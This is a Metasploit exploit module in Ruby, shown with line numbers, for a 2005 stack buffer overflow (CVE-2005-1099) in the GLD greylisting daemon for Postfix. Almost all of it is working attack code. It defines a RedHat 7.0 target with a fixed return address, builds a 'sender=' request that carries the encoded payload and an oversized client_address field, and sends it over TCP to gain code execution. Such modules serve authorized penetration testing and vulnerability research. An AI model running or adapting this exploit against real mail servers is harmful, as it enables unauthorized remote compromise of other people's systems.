1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name'	=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
16
        'Description'	=> %q{
17
          This module exploits a stack buffer overflow in the Salim Gasmi
18
          GLD <= 1.4 greylisting daemon for Postfix. By sending an
19
          overly long string the stack can be overwritten.
20
        },
21
        'Author'	=> [ 'aushack' ],
22
        'Arch'	=> ARCH_X86,
23
        'Platform'	=> 'linux',
24
        'References' => [
25
          [ 'CVE', '2005-1099' ],
26
          [ 'OSVDB', '15492' ],
27
          [ 'BID', '13129' ],
28
          [ 'EDB', '934' ]
29
        ],
30
        'Privileged'	=> true,
31
        'License'	=> MSF_LICENSE,
32
        'Payload' => {
33
          'Space' => 1000,
34
          'BadChars' => "\x00\x0a\x0d\x20=",
35
          'StackAdjustment' => -3500,
36
        },
37
        'Targets' => [
38
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
39
        ],
40
        'DefaultTarget'	=> 0,
41
        'DisclosureDate' => '2005-04-12',
42
        'Notes' => {
43
          'Reliability' => UNKNOWN_RELIABILITY,
44
          'Stability' => UNKNOWN_STABILITY,
45
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
46
        }
47
      )
48
    )
49

50
    register_options(
51
      [
52
        Opt::RPORT(2525)
53
      ],
54
      self.class
55
    )
56
  end
57

58
  def exploit
59
    connect
60

61
    sploit = "sender=" + payload.encoded + "\r\n"
62
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
63

64
    sock.put(sploit)
65
    handler
66
    disconnect
67
  end
68
end
69

70